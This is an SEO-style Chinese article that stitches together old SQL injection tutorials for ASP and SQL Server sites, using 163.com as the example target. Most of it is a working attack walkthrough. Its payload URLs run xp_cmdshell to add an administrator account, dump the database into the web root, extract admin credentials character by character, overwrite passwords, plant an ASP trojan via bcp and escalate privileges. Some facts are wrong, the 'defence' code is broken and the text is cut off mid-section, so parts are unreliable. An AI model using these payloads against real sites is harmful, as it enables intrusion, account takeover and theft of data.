正文

sql注入有哪幾種方式

發(fā)布時(shí)間：2023-04-14 07:48:26 稿源：創(chuàng)意嶺閱讀： 134

大家好！今天讓創(chuàng)意嶺的小編來大家介紹下關(guān)于sql注入有哪幾種方式的問題，以下是小編對(duì)此問題的歸納整理，讓我們一起來看看吧。

開始之前先推薦一個(gè)非常厲害的Ai人工智能工具，一鍵生成原創(chuàng)文章、方案、文案、工作計(jì)劃、工作報(bào)告、論文、代碼、作文、做題和對(duì)話答疑等等

只需要輸入關(guān)鍵詞，就能返回你想要的內(nèi)容，越精準(zhǔn)，寫出的就越詳細(xì)，有微信小程序端、在線網(wǎng)頁版、PC客戶端

官網(wǎng)：https://ai.de1919.com。

創(chuàng)意嶺作為行業(yè)內(nèi)優(yōu)秀的企業(yè)，服務(wù)客戶遍布全球各地，如需了解SEO相關(guān)業(yè)務(wù)請(qǐng)撥打電話175-8598-2043，或添加微信：1454722008

本文目錄:

1、SQL注入攻擊有哪些方法？
2、關(guān)于SQL注入
3、幾種常見的SQL注入閉合方式
4、什么是SQL注入及SQL注入工具

sql注入有哪幾種方式

一、SQL注入攻擊有哪些方法？

“SQL注入”是一種利用未過濾/未審核用戶輸入的攻擊方法（“緩存溢出”和這個(gè)不同），意思就是讓應(yīng)用運(yùn)行本不應(yīng)該運(yùn)行的SQL代碼。如果應(yīng)用毫無防備地創(chuàng)建了SQL字符串并且運(yùn)行了它們，就會(huì)造成一些出人意料的結(jié)果。

具體注入?yún)⒖迹篽ttp://www.techug.com/sql-injection-attacks-by-example

二、關(guān)于SQL注入

<二>SQL注入思路

思路最重要。其實(shí)好多人都不知道SQL到底能做什么呢？這里總結(jié)一下SQL注入入侵的總體的思路：

1. SQL注入漏洞的判斷，即尋找注入點(diǎn)

2. 判斷后臺(tái)數(shù)據(jù)庫類型

3. 確定XP_CMDSHELL可執(zhí)行情況；若當(dāng)前連接數(shù)據(jù)的帳號(hào)具有SA權(quán)限，且master.dbo.xp_cmdshell擴(kuò)展存儲(chǔ)過程(調(diào)用此存儲(chǔ)過程可以直接使用操作系統(tǒng)的shell)能夠正確執(zhí)行，則整個(gè)計(jì)算機(jī)可以通過幾種方法完全控制，也就完成了整個(gè)注入過程，否則繼續(xù)：

1. 發(fā)現(xiàn)WEB虛擬目錄

2. 上傳ASP木馬；

3. 得到管理員權(quán)限

具體步驟：

一、SQL注入漏洞的判斷

如果以前沒玩過注入，請(qǐng)把IE菜單-工具-Internet選項(xiàng)－高級(jí)－顯示友好HTTP錯(cuò)誤信息前面的勾去掉。

為了把問題說明清楚，以下以http://www.163.com/news.asp?id=xx(這個(gè)地址是假想的)，為例進(jìn)行分析，xx可能是整型，也有可能是字符串。

1、整型參數(shù)的判斷

當(dāng)輸入的參數(shù)xx為整型時(shí)，通常news.asp中SQL語句原貌大致如下：

select * from 表名 where 字段=xx，所以可以用以下步驟測(cè)試SQL注入是否存在。

最簡單的判斷方法

http://www.163.com/news.asp?id=xx’(附加一個(gè)單引號(hào))，

此時(shí)news.asp中的SQL語句變成了

select * from 表名 where 字段=xx’，

如果程序沒有過濾好“’”的話，就會(huì)提示 news.asp運(yùn)行異常；但這樣的方法雖然很簡單，但并不是最好的，因?yàn)椋?/p>

first,不一定每臺(tái)服務(wù)器的IIS都返回具體錯(cuò)誤提示給客戶端，如果程序中加了cint(參數(shù))之類語句的話，SQL注入是不會(huì)成功的，但服務(wù)器同樣會(huì)報(bào)錯(cuò)，具體提示信息為處理 URL 時(shí)服務(wù)器上出錯(cuò)。請(qǐng)和系統(tǒng)管理員聯(lián)絡(luò)。

second，目前大多數(shù)程序員已經(jīng)將“’“ 過濾掉，所以用” ’”測(cè)試不到注入點(diǎn)，所以一般使用經(jīng)典的1=1和1=2測(cè)試方法，見下文：

http://www.163.com/news.asp?id=xx and 1=1, news.asp運(yùn)行正常，

而且與http://www.163.com/news.asp?id=xx運(yùn)行結(jié)果相同；

http://www.163.com/news.asp?id=xx and 1=2, news.asp運(yùn)行異常；（這就是經(jīng)典的 1=1 1=2 判斷方法）

如果以上面滿足，news.asp中就會(huì)存在SQL注入漏洞，反之則可能不能注入。

2、字符串型參數(shù)的判斷

方法與數(shù)值型參數(shù)判斷方法基本相同

當(dāng)輸入的參數(shù)xx為字符串時(shí)，通常news.asp中SQL語句原貌大致如下：

select * from 表名 where 字段='xx'，所以可以用以下步驟測(cè)試SQL注入是否存在。

http://www.163.com/news.asp?id=xx’(附加一個(gè)單引號(hào))，此時(shí)news.asp中的SQL語句變成了

select * from 表名 where 字段=xx’，news.asp運(yùn)行異常；

http://www.163.com/news.asp?id=xx and '1'='1', news.asp運(yùn)行正常，

而且與http://www.163.com/news.asp?id=xx運(yùn)行結(jié)果相同；

http://www.163.com/news.asp?id=xx and '1'='2', news.asp運(yùn)行異常；

如果以上滿足，則news.asp存在SQL注入漏洞，反之則不能注入

3、特殊情況的處理

有時(shí)ASP程序員會(huì)在程序員過濾掉單引號(hào)等字符，以防止SQL注入。此時(shí)可以用以下幾種方法試一試。

①大小定混合法：由于VBS并不區(qū)分大小寫，而程序員在過濾時(shí)通常要么全部過濾大寫字符串，要么全部過濾小寫字符串，而大小寫混合往往會(huì)被忽視。如用SelecT代替select,SELECT等；

②UNICODE法：在IIS中，以UNICODE字符集實(shí)現(xiàn)國際化，我們完全可以IE中輸入的字符串化成UNICODE字符串進(jìn)行輸入。如+ =%2B，空格=%20 等；URLEncode信息參見附件一；

③ASCII碼法：可以把輸入的部分或全部字符全部

<4>出了上述方法以外，還有個(gè)更簡單的方法就是使用現(xiàn)成的工具像NB聯(lián)盟的NBSI就是一款很不錯(cuò)的工具，目前最新的版本為2.2

二、判斷數(shù)據(jù)庫類型

不同的數(shù)據(jù)庫的函數(shù)、注入方法都是有差異的，所以在注入之前，我們還要判斷一下數(shù)據(jù)庫的類型。一般ASP最常搭配的數(shù)據(jù)庫是Access和SQLServer，網(wǎng)上超過99%的網(wǎng)站都是其中之一。

怎么讓程序告訴你它使用的什么數(shù)據(jù)庫呢？來看看：

SQLServer有一些系統(tǒng)變量，如果服務(wù)器IIS提示沒關(guān)閉，并且SQLServer返回錯(cuò)誤提示的話，那可以直接從出錯(cuò)信息獲取，方法如下：

http://www.163.com/news.asp?id=xx;and user>0

這句語句很簡單，但卻包含了SQLServer特有注入方法的精髓，我自己也是在一次無意的測(cè)試中發(fā)現(xiàn)這種效率極高的猜解方法。讓我看來看看它的含義：首先，前面的語句是正常的，重點(diǎn)在and user>0，我們知道，user是SQLServer的一個(gè)內(nèi)置變量，它的值是當(dāng)前連接的用戶名，類型為nvarchar。拿一個(gè) nvarchar的值跟int的數(shù)0比較，系統(tǒng)會(huì)先試圖將nvarchar的值轉(zhuǎn)成int型，當(dāng)然，轉(zhuǎn)的過程中肯定會(huì)出錯(cuò)，SQLServer的出錯(cuò)提示是：將nvarchar值 ”abc” 轉(zhuǎn)換數(shù)據(jù)類型為 int 的列時(shí)發(fā)生語法錯(cuò)誤，呵呵，abc正是變量user的值，這樣，不廢吹灰之力就拿到了數(shù)據(jù)庫的用戶名。在以后的篇幅里，大家會(huì)看到很多用這種方法的語句。順便說幾句，眾所周知，SQLServer的用戶sa是個(gè)等同Adminstrators權(quán)限的角色，拿到了sa權(quán)限，幾乎肯定可以拿到主機(jī)的 Administrator了。上面的方法可以很方便的測(cè)試出是否是用sa登錄，要注意的是：如果是sa登錄，提示是將”dbo”轉(zhuǎn)換成int的列發(fā)生錯(cuò)誤，而不是”sa”。

如果服務(wù)器IIS不允許返回錯(cuò)誤提示，那怎么判斷數(shù)據(jù)庫類型呢？我們可以從Access和SQLServer和區(qū)別入手，Access和 SQLServer都有自己的系統(tǒng)表，比如存放數(shù)據(jù)庫中所有對(duì)象的表，Access是在系統(tǒng)表[msysobjects]中，但在Web環(huán)境下讀該表會(huì)提示“沒有權(quán)限”，SQLServer是在表[sysobjects]中，在Web環(huán)境下可正常讀取。

在確認(rèn)可以注入的情況下，使用下面的語句：

http://www.163.com/news.asp?id=xx ;and (select count(*) from sysobjects)>0

http://www.163.com/news.asp?id=xx ;and (select count(*) from msysobjects)>0

如果數(shù)據(jù)庫是SQLServer，那么第一個(gè)網(wǎng)址的頁面與原頁面http://www.163.com/news.asp?id=xx是大致相同的；而第二個(gè)網(wǎng)址，由于找不到表msysobjects，會(huì)提示出錯(cuò)，就算程序有容錯(cuò)處理，頁面也與原頁面完全不同。

如果數(shù)據(jù)庫用的是Access，那么情況就有所不同，第一個(gè)網(wǎng)址的頁面與原頁面完全不同；第二個(gè)網(wǎng)址，則視乎數(shù)據(jù)庫設(shè)置是否允許讀該系統(tǒng)表，一般來說是不允許的，所以與原網(wǎng)址也是完全不同。大多數(shù)情況下，用第一個(gè)網(wǎng)址就可以得知系統(tǒng)所用的數(shù)據(jù)庫類型，第二個(gè)網(wǎng)址只作為開啟IIS錯(cuò)誤提示時(shí)的驗(yàn)證。

三、確定XP_CMDSHELL可執(zhí)行情況

若當(dāng)前連接數(shù)據(jù)的帳號(hào)具有SA權(quán)限，且master.dbo.xp_cmdshell擴(kuò)展存儲(chǔ)過程(調(diào)用此存儲(chǔ)過程可以直接使用操作系統(tǒng)的shell)能夠正確執(zhí)行，則整個(gè)計(jì)算機(jī)可以通過以下幾種方法完全控制，以后的所有步驟都可以省

1、http://www.163.com/news.asp?id=xx and user>;0 news.asp執(zhí)行異常但可以得到當(dāng)前連接數(shù)據(jù)庫的用戶名(若顯示dbo則代表SA)。

2、http://www.163.com/news.asp?id=xx and db_name()>0 news.asp執(zhí)行異常但可以得到當(dāng)前連接的數(shù)據(jù)庫名。

3、http://www.163.com/news.asp?id=xx；exec master..xp_cmdshell “net user aaa bbb /add”-- (master是SQL-SERVER的主數(shù)據(jù)

庫；名中的分號(hào)表示SQL-SERVER執(zhí)行完分號(hào)前的語句名，繼續(xù)執(zhí)行其后面的語句；“—”號(hào)是注解，表示其后面的所有內(nèi)容僅為注釋，系統(tǒng)并不執(zhí)行)可以直接增加操作系統(tǒng)帳戶aaa,密碼為bbb。

4、http://www.163.com/news.asp?id=xx；exec master..xp_cmdshell “net localgroup administrators aaa /add”-- 把剛剛增加

的帳戶aaa加到administrators組中。

5、http://www.163.com/news.asp?id=xx；backuup database 數(shù)據(jù)庫名 to disk='c:\inetpub\wwwroot\save.db' 則把得到的數(shù)據(jù)內(nèi)容

全部備份到WEB目錄下，再用HTTP把此文件下載(當(dāng)然首選要知道WEB虛擬目錄)。

6、通過復(fù)制CMD創(chuàng)建UNICODE漏洞

http://www.163.com/news.asp?id=xx;exec master.dbo.xp_cmdshell “copy c:\winnt\system32\cmd.exe

c:\inetpub\scripts\cmd.exe” 便制造了一個(gè)UNICODE漏洞，通過此漏洞的利用方法，便完成了對(duì)整個(gè)計(jì)算機(jī)的控制(當(dāng)然首選要知道WEB虛擬目錄)。

這樣你就成功的完成了一次SQL注入攻擊，先別興奮，在實(shí)踐時(shí)你就會(huì)發(fā)現(xiàn)這比理論要難的多會(huì)有更多的困難等著你come over ，下面GO ON如果上述條件不成立則需繼續(xù)奮斗（要掛馬了：））

GO ON~!

當(dāng)上述條件不成立時(shí)就要繼續(xù)下面的步驟

(一)、發(fā)現(xiàn)WEB虛擬目錄

只有找到WEB虛擬目錄，才能確定放置ASP木馬的位置，進(jìn)而得到USER權(quán)限。有兩種方法比較有效。

一是根據(jù)經(jīng)驗(yàn)猜解，一般來說，WEB虛擬目錄是：c:\inetpub\wwwroot;

D:\inetpub\wwwroot; E:\inetpub\wwwroot等，而可執(zhí)行虛擬目錄是：

c:\inetpub\scripts; D:\inetpub\scripts; E:\inetpub\scripts等。

二是遍歷系統(tǒng)的目錄結(jié)構(gòu)，分析結(jié)果并發(fā)現(xiàn)WEB虛擬目錄；

先創(chuàng)建一個(gè)臨時(shí)表：temp

http://www.163.com/news.asp?id=xx;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3

nvarchar(255));--

接下來：

1 我們可以利用xp_availablemedia來獲得當(dāng)前所有驅(qū)動(dòng)器,并存入temp表中：

http://www.163.com/news.asp?id=xx;insert temp exec master.dbo.xp_availablemedia;--

我們可以通過查詢temp的內(nèi)容來獲得驅(qū)動(dòng)器列表及相關(guān)信息

2 我們可以利用xp_subdirs獲得子目錄列表,并存入temp表中：

http://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--

3 我們還可以利用xp_dirtree獲得所有子目錄的目錄樹結(jié)構(gòu),并寸入temp表中：

http://www.163.com/news.asp?id=xx;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--

這樣就可以成功的瀏覽到所有的目錄（文件夾）列表：

如果我們需要查看某個(gè)文件的內(nèi)容，可以通過執(zhí)行xp_cmdsell：

http://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--

使用'bulk insert'語法可以將一個(gè)文本文件插入到一個(gè)臨時(shí)表中。如：bulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp'

瀏覽temp就可以看到index.asp文件的內(nèi)容了！通過分析各種ASP文件，可以得到大量系統(tǒng)信息，WEB建設(shè)與管理信息，甚至可以得到SA帳號(hào)的連接密碼。

當(dāng)然，如果xp_cmshell能夠執(zhí)行，我們可以用它來完成：

http://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';--

http://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\ *.asp /s/a';--

通過xp_cmdshell我們可以看到所有想看到的，包括W3svc

http://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'cscript

C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc'

但是，如果不是SA權(quán)限，我們還可以使用

http://www.163.com/news.asp?id=xx;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--

注意：

1、以上每完成一項(xiàng)瀏覽后，應(yīng)刪除TEMP中的所有內(nèi)容，刪除方法是：

http://www.163.com/news.asp?id=xx;delete from temp;--

2、瀏覽TEMP表的方法是：(假設(shè)TestDB是當(dāng)前連接的數(shù)據(jù)庫名)

http://www.163.com/news.asp?id=xx and (select top 1 id from TestDB.dbo.temp )>0

得到表TEMP中第一條記錄id字段的值，并與整數(shù)進(jìn)行比較，顯然news.asp工作異常，但在異常中卻可以發(fā)現(xiàn)id字段的值。假設(shè)發(fā)現(xiàn)的表名是xyz，則

http://www.163.com/news.asp?id=xx and (select top 1 id from TestDB.dbo.temp )>0 where id not in('xyz'))>0

得到表TEMP中第二條記錄id字段的值。

(二)、上傳ASP木馬

所謂ASP木馬，就是一段有特殊功能的ASP代碼，并放入WEB虛擬目錄的Scripts下，遠(yuǎn)程客戶通過IE就可執(zhí)行它，進(jìn)而得到系統(tǒng)的USER權(quán)限，實(shí)現(xiàn)對(duì)系統(tǒng)的初步控制。上傳ASP木馬一般有兩種比較有效的方法：

1、利用WEB的遠(yuǎn)程管理功能

許多WEB站點(diǎn)，為了維護(hù)的方便，都提供了遠(yuǎn)程管理的功能；也有不少WEB站點(diǎn)，其內(nèi)容是對(duì)于不同的用戶有不同的訪問權(quán)限。為了達(dá)到對(duì)用戶權(quán)限的控制，都有一個(gè)網(wǎng)頁，要求用戶名與密碼，只有輸入了正確的值，才能進(jìn)行下一步的操作,可以實(shí)現(xiàn)對(duì)WEB的管理，如上傳、下載文件，目錄瀏覽、修改配置等。

因此，若獲取正確的用戶名與密碼，不僅可以上傳ASP木馬，有時(shí)甚至能夠直接得到USER權(quán)限而瀏覽系統(tǒng)，上一步的“發(fā)現(xiàn)WEB虛擬目錄”的復(fù)雜操作都可省略。

用戶名及密碼一般存放在一張表中，發(fā)現(xiàn)這張表并讀取其中內(nèi)容便解決了問題。以下給出兩種有效方法。

A、注入法：

從理論上說，認(rèn)證網(wǎng)頁中會(huì)有型如：

select * from admin where username='XXX' and password='YYY' 的語句，若在正式運(yùn)行此句之前，沒有進(jìn)行必要的字符過濾，則很容易實(shí)施SQL注入。

如在用戶名文本框內(nèi)輸入：abc’ or 1=1-- 在密碼框內(nèi)輸入：123 則SQL語句變成：

select * from admin where username='abc’ or 1=1 and password='123’

不管用戶輸入任何用戶名與密碼，此語句永遠(yuǎn)都能正確執(zhí)行，用戶輕易騙過系統(tǒng)，獲取合法身份。

B、猜解法：

基本思路是：猜解所有數(shù)據(jù)庫名稱，猜出庫中的每張表名，分析可能是存放用戶名與密碼的表名，猜出表中的每個(gè)字段名，猜出表中的每條記錄內(nèi)容。

a 猜解所有數(shù)據(jù)庫名稱

http://www.163.com/news.asp?id=xx and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) <>0

因?yàn)閐bid的值從1到5，是系統(tǒng)用了。所以用戶自己建的一定是從6開始的。并且我們提交了 name>1 (name字段是一個(gè)字符型的字段和數(shù)字比較會(huì)出錯(cuò)),news.asp工作異常，可得到第一個(gè)數(shù)據(jù)庫名，同理把DBID分別改成7,8，9,10,11,12…就可得到所有數(shù)據(jù)庫名。

以下假設(shè)得到的數(shù)據(jù)庫名是TestDB。

b 猜解數(shù)據(jù)庫中用戶名表的名稱

猜解法：此方法就是根據(jù)個(gè)人的經(jīng)驗(yàn)猜表名，一般來說，

user,users,member,members,userlist,memberlist,userinfo,manager,admin,adminuser,systemuser,

systemusers,sysuser,sysusers,sysaccounts,systemaccounts等。并通過語句進(jìn)行判斷

http://www.163.com/news.asp?id=xx and (select count(*) from TestDB.dbo.表名)>0 若表名存在，則news.asp工作正常，否則異常。如此循環(huán)，直到猜到系統(tǒng)帳號(hào)表的名稱。

讀取法：SQL-SERVER有一個(gè)存放系統(tǒng)核心信息的表sysobjects，有關(guān)一個(gè)庫的所有表，視圖等信息全部存放在此表中，而且此表可以通過WEB進(jìn)行訪問。

當(dāng)xtype='U' and status>0代表是用戶建立的表，發(fā)現(xiàn)并分析每一個(gè)用戶建立的表及名稱，便可以得到用戶名表的名稱，基本的實(shí)現(xiàn)方法是：

①http://www.163.com/news.asp?id=xx and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0 )>0

得到第一個(gè)用戶建立表的名稱，并與整數(shù)進(jìn)行比較，顯然news.asp工作異常，但在異常中卻可以發(fā)現(xiàn)表的名稱。假設(shè)發(fā)現(xiàn)的表名是xyz，則

②http://www.163.com/news.asp?id=xx and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0 and

name not in('xyz'))>0 可以得到第二個(gè)用戶建立的表的名稱，同理就可得到所有用建立的表的名稱。

根據(jù)表的名稱，一般可以認(rèn)定那張表用戶存放用戶名及密碼，以下假設(shè)此表名為Admin。

c 猜解用戶名字段及密碼字段名稱

admin表中一定有一個(gè)用戶名字段，也一定有一個(gè)密碼字段，只有得到此兩個(gè)字段的名稱，才有可能得到此兩字段的內(nèi)容。如何得到它們的名稱呢，同樣有以下兩種方法。

猜解法：此方法就是根據(jù)個(gè)人的經(jīng)驗(yàn)猜字段名，一般來說，用戶名字段的名稱常用：username,name,user,account等。而密碼字段的名稱常用：password,pass,pwd,passwd等。并通過語句進(jìn)行判斷

http://www.163.com/news.asp?id=xx and (select count(字段名) from TestDB.dbo.admin)>0 “select count(字段名) from 表名”

語句得到表的行數(shù)，所以若字段名存在，則news.asp工作正常，否則異常。如此循環(huán)，直到猜到兩個(gè)字段的名稱。

讀取法：基本的實(shí)現(xiàn)方法是

http://www.163.com/news.asp?id=xx and (select top 1 col_name(object_id('admin'),1) from TestDB.dbo.sysobjects)>0 。

select top 1 col_name(object_id('admin'),1) from TestDB.dbo.sysobjects是從sysobjects得到已知表名的第一個(gè)字段名，當(dāng)與整數(shù)進(jìn)行比較，顯然news.asp工作異常，但在異常中卻可以發(fā)現(xiàn)字段的名稱。把col_name(object_id('admin'),1)中的1依次換成2,3,4,5，6…就可得到所有的字段名稱。

d 猜解用戶名與密碼

猜用戶名與密碼的內(nèi)容最常用也是最有效的方法有：

ASCII碼逐字解碼法:雖然這種方法速度較慢，但肯定是可行的。基本的思路是先猜出字段的長度，然后依次猜出每一位的值。猜用戶名與猜密碼的方法相同，以下以猜用戶名為例說明其過程。

http://www.163.com/news.asp?id=xx and (select top 1 len(username) from TestDB.dbo.admin)=X(X=1,2，3,4，5，… n，username

為用戶名字段的名稱，admin為表的名稱)，若x為某一值i且news.asp運(yùn)行正常時(shí)，則i就是第一個(gè)用戶名的長度。如：當(dāng)輸入

http://www.163.com/news.asp?id=xx and (select top 1 len(username) from TestDB.dbo.admin)=8時(shí)news.asp運(yùn)行正常，則第一個(gè)用戶名的長度為8

http://www.163.com/news.asp?id=xx and (select top 1 ascii(substring(username,m,1)) from TestDB.dbo.admin)=n (m的值在1到上一步得到的用戶名長度之間，當(dāng)m=1，2,3，…時(shí)猜測(cè)分別猜測(cè)第1,2,3,…位的值；n的值是1~9、a~z、A~Z的ASCII值，也就是1~128之間的任意值；admin為系統(tǒng)用戶帳號(hào)表的名稱)，若n為某一值i且news.asp運(yùn)行正常時(shí)，則i對(duì)應(yīng)ASCII碼就是用戶名某一位值。如：當(dāng)輸入

http://www.163.com/news.asp?id=xx and (select top 1 ascii(substring(username,3,1)) from TestDB.dbo.admin)=80時(shí)news.asp運(yùn)行正常，則用戶名的第三位為P(P的ASCII為80)；http://www.163.com/news.asp?id=xx and (select top 1 ascii(substring(username,9,1)) from TestDB.dbo.admin)=33時(shí)news.asp運(yùn)行正常，則用戶名的第9位為!(!的ASCII為80)；猜到第一個(gè)用戶名及密碼后，同理，可以猜出其他所有用戶名與密碼。注意：有時(shí)得到的密碼可能是經(jīng)MD5等方式加密后的信息，還需要用專用工具進(jìn)行脫密?；蛘呦雀钠涿艽a，使用完后再改回來，見下面說明。簡單法：猜用戶名用http://www.163.com/news.asp?id=xx and (select top 1 flag from TestDB.dbo.admin where username>1) , flag是admin表中的一個(gè)字段，username是用戶名字段，此時(shí)news.asp工作異常，但能得到Username的值。與上同樣的方法，可以得到第二用戶名，第三個(gè)用戶等等，直到表中的所有用戶名。

猜用戶密碼：http://www.163.com/news.asp?id=xx and (select top 1 flag from TestDB.dbo.admin where pwd>1) , flag是admin表中的一個(gè)字段，pwd是密碼字段，此時(shí)news.asp工作異常，但能得到pwd的值。與上同樣的方法，可以得到第二用戶名的密碼，第三個(gè)用戶的密碼等等，直到表中的所有用戶的密碼。密碼有時(shí)是經(jīng)MD5加密的，可以改密碼。

http://www.163.com/news.asp?id=xx;update TestDB.dbo.admin set pwd=' a0b923820dcc509a' where username='www';-- ( 1的MD5值為：AAABBBCCCDDDEEEF，即把密碼改成1；www為已知的用戶名)用同樣的方法當(dāng)然可把密碼改原來的值。

2、利用表內(nèi)容導(dǎo)成文件功能

SQL有BCP命令，它可以把表的內(nèi)容導(dǎo)成文本文件并放到指定位置。利用這項(xiàng)功能，我們可以先建一張臨時(shí)表，然后在表中一行一行地輸入一個(gè)ASP木馬，然后用BCP命令導(dǎo)出形成ASP文件。

命令行格式如下：

bcp "select * from text..foo" queryout c:\inetpub\wwwroot\163.asp –c –S localhost –U sa –P foobar

('S'參數(shù)為執(zhí)行查詢的服務(wù)器，'U'參數(shù)為用戶名，'P'參數(shù)為密碼，最終上傳了一個(gè)163.asp的木馬)

3、利用工具，如NBSI給出的一些參考數(shù)據(jù)最重要的表名：

select * from sysobjects

sysobjects ncsysobjects

sysindexes tsysindexes

syscolumns

systypes

sysusers

sysdatabases

sysxlogins

sysprocesses

最重要的一些用戶名（默認(rèn)sql數(shù)據(jù)庫中存在著的）

public

dbo

guest(一般禁止，或者沒權(quán)限)

db_sercurityadmin

ab_dlladmin

一些默認(rèn)擴(kuò)展

xp_regaddmultistring

xp_regdeletekey

xp_regdeletevalue

xp_regenumkeys

xp_regenumvalues

xp_regread

xp_regremovemultistring

xp_regwrite

xp_availablemedia 驅(qū)動(dòng)器相關(guān)

xp_dirtree 目錄

xp_enumdsn ODBC連接

xp_loginconfig 服務(wù)器安全模式信息

xp_makecab 創(chuàng)建壓縮卷

xp_ntsec_enumdomains domain信息

xp_terminate_process 終端進(jìn)程，給出一個(gè)PID

(三)、得到系統(tǒng)的管理員權(quán)限

ASP木馬只有USER權(quán)限，要想獲取對(duì)系統(tǒng)的完全控制，還要有系統(tǒng)的管理員權(quán)限。怎么辦？提升權(quán)限的方法有很多種：

上傳木馬，修改開機(jī)自動(dòng)運(yùn)行的.ini文件(它一重啟，便死定了)；

復(fù)制CMD.exe到scripts，人為制造UNICODE漏洞；

下載SAM文件，綠色并獲取OS的所有用戶名密碼；

等等，視系統(tǒng)的具體情況而定，可以采取不同的方法。

那么我們?cè)趺捶雷⑷肽?？程序如下加入到asp或html或php或cgi里面都可以。經(jīng)過測(cè)試。加入如 top.asp文件中開頭

方法一：

<%if session("username"="" or session("userkey"="" then

response.redirect "../../"

end if%>

(說明：只要有用戶注入則跳轉(zhuǎn)到../../目錄，呵呵，看你怎么給我注入)

方法二：

server_v1=Cstr(Request.ServerVariables("HTTP_REFERER")

server_v2=Cstr(Request.ServerVariables("SERVER_NAME")

if mid(server_v1,8,len(server_v2))<>server_v2 then

response.write "<br><br><center><table border=1 cellpadding=20 bordercolor=black bgcolor=#EEEEEE width=450>"

response.write "<tr><td style=“font:9pt Verdana">"

response.write "你提交的路徑有誤，禁止從站點(diǎn)外部提交數(shù)據(jù)請(qǐng)不要亂該參數(shù)！"

response.write "</td></tr></table></center>"

response.end

end if

(說明：只要有用戶注入則判斷為外部連接哦，呵呵，看你怎么給我注入)

方法三：

<% dim From_url,Serv_url

From_url = Cstr(Request.ServerVariables("HTTP_REFERER")

Serv_url = Cstr(Request.ServerVariables("SERVER_NAME")

if mid(From_url,8,len(Serv_url)) <> Serv_url then

response.write "NO"

response.redirect("../"

response.end

end if%>

三、幾種常見的SQL注入閉合方式

or 1=1--+

'or 1=1--+

"or 1=1--+

)or 1=1--+

')or 1=1--+

")or 1=1--+

"))or 1=1--+

四、什么是SQL注入及SQL注入工具

分類: 電腦/網(wǎng)絡(luò) >> 程序設(shè)計(jì) >> 其他編程語言

解析:

隨著B/S模式應(yīng)用開發(fā)的發(fā)展，使用這種模式編寫應(yīng)用程序的程序員也越來越多。但是由于這個(gè)行業(yè)的入門門檻不高，程序員的水平及經(jīng)驗(yàn)也參差不齊，相當(dāng)大一部分程序員在編寫代碼的時(shí)候，沒有對(duì)用戶輸入數(shù)據(jù)的合法性進(jìn)行判斷，使應(yīng)用程序存在安全隱患。用戶可以提交一段數(shù)據(jù)庫查詢代碼，根據(jù)程序返回的結(jié)果，獲得某些他想得知的數(shù)據(jù)，這就是所謂的SQL Injection，即SQL注入。

SQL注入是從正常的WWW端口訪問，而且表面看起來跟一般的Web頁面訪問沒什么區(qū)別，所以目前市面的防火墻都不會(huì)對(duì)SQL注入發(fā)出警報(bào)，如果管理員沒查看IIS日志的習(xí)慣，可能被入侵很長時(shí)間都不會(huì)發(fā)覺。

但是，SQL注入的手法相當(dāng)靈活，在注入的時(shí)候會(huì)碰到很多意外的情況。能不能根據(jù)具體情況進(jìn)行分析，構(gòu)造巧妙的SQL語句，從而成功獲取想要的數(shù)據(jù)，是高手與“菜鳥”的根本區(qū)別。

根據(jù)國情，國內(nèi)的網(wǎng)站用ASP+Access或SQLServer的占70%以上，PHP+MySQ占L20%，其他的不足10%。在本文，我們從分入門、進(jìn)階至高級(jí)講解一下ASP注入的方法及技巧，PHP注入的文章由NB聯(lián)盟的另一位朋友zwell撰寫，希望對(duì)安全工作者和程序員都有用處。了解ASP注入的朋友也請(qǐng)不要跳過入門篇，因?yàn)椴糠秩藢?duì)注入的基本判斷方法還存在誤區(qū)。大家準(zhǔn)備好了嗎？Let's Go...

入門篇

如果你以前沒試過SQL注入的話，那么第一步先把IE菜單=>工具=>Inter選項(xiàng)=>高級(jí)=>顯示友好 HTTP 錯(cuò)誤信息前面的勾去掉。否則，不論服務(wù)器返回什么錯(cuò)誤，IE都只顯示為HTTP 500服務(wù)器錯(cuò)誤，不能獲得更多的提示信息。

第一節(jié)、SQL注入原理

以下我們從一個(gè)網(wǎng)站19開始（注：本文發(fā)表前已征得該站站長同意，大部分都是真實(shí)數(shù)據(jù)）。

在網(wǎng)站首頁上，有名為“IE不能打開新窗口的多種解決方法”的鏈接，地址為：19/showdetail?id=49，我們?cè)谶@個(gè)地址后面加上單引號(hào)’，服務(wù)器會(huì)返回下面的錯(cuò)誤提示：

Microsoft JET Database Engine 錯(cuò)誤 '80040e14'

字符串的語法錯(cuò)誤在查詢表達(dá)式 'ID=49'' 中。

/showdetail，行8

從這個(gè)錯(cuò)誤提示我們能看出下面幾點(diǎn)：

1.網(wǎng)站使用的是Access數(shù)據(jù)庫，通過JET引擎連接數(shù)據(jù)庫，而不是通過ODBC。

2.程序沒有判斷客戶端提交的數(shù)據(jù)是否符合程序要求。

3.該SQL語句所查詢的表中有一名為ID的字段。

從上面的例子我們可以知道，SQL注入的原理，就是從客戶端提交特殊的代碼，從而收集程序及服務(wù)器的信息，從而獲取你想到得到的資料。

第二節(jié)、判斷能否進(jìn)行SQL注入

看完第一節(jié)，有一些人會(huì)覺得：我也是經(jīng)常這樣測(cè)試能否注入的，這不是很簡單嗎？

其實(shí)，這并不是最好的方法，為什么呢？

首先，不一定每臺(tái)服務(wù)器的IIS都返回具體錯(cuò)誤提示給客戶端，如果程序中加了cint(參數(shù))之類語句的話，SQL注入是不會(huì)成功的，但服務(wù)器同樣會(huì)報(bào)錯(cuò)，具體提示信息為處理 URL 時(shí)服務(wù)器上出錯(cuò)。請(qǐng)和系統(tǒng)管理員聯(lián)絡(luò)。

